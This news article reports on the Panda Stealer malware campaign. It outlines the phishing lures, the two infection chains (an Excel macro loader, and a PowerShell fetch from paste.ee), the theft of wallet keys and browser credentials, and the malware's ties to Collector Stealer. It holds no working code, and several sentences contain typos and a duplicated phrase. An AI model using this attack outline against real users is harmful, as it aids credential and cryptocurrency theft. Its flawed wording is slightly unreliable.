In the latest reports, it has been found that the Panda Stealer malware has been targeting big-time applications like Discord, as well as cryptocurrency wallets in a global scam campaign.
The attack campaign of Panda Stealer primarily targets users in Australia, Germany, Japan, and the United States.
The information steamer was reportedly found by security researchers at Trend Micro at the beginning of April.
A Two-Stage infection chain:
The malware begins its infection chain through phishing emails and analyzing its descriptive samples also indicates that victims have been downloading executables from malicious websites via Discord links.
Panda Stealer’s phishing emails pretend to be business quote requests.
This similar technique was apparently used by the recently discovered Phobos ransomware campaign.
The researchers had detected two infection chains being used by the campaign.
Detailing the acute working of the malware “Panda Stealer” in these two chains, it was noted that a .XLSM attachment containing macros downloads a loader. Subsequently, the loader downloads and executes the main stealer.
“The other infection chain involves an attached .XLS file containing an Excel formula that utilizes a PowerShell command to access paste.ee, a Pastebin alternative, that accesses a second encrypted PowerShell command.” noted the security researchers.
Malicious capabilities and similarities with Collection Stealer:
When installed the Panda Stealer malware has the capabilities to gather data like private keys and records of past transactions private keys and records of past transactions victim’s various digital currency wallets, including Dash, Bytecoin, Litecoin, and Ethereum.
Some of the other capabilities of the Panda Stealer include being able to take screenshots of the impacted systems and exfiltrate data from browsers like cookies, passwords as well as cards.
The campaign was also linked to an IP address that was assigned to a virtual private server by analyzing its active command-to-control (C2) servers.
The virtual private server was rented from Shock Hosting and having determined this, the web hosting services company has since suspended the server assigned to the IP address.
The Panda Stealer malware was grounded to be a Collecter Stealer variant because of their analogous architecture, cracked by Russian threat actor NCP, also known as su1c1de.
“Because the cracked Collector Stealer builder is openly accessible online, cybercriminal groups and script kiddies alike can use it to create their own customized version of the stealer and C&C panel,” noted researchers.
While the two stealers behave similarly, they have different command and control server URLs, build tags, and execution folders.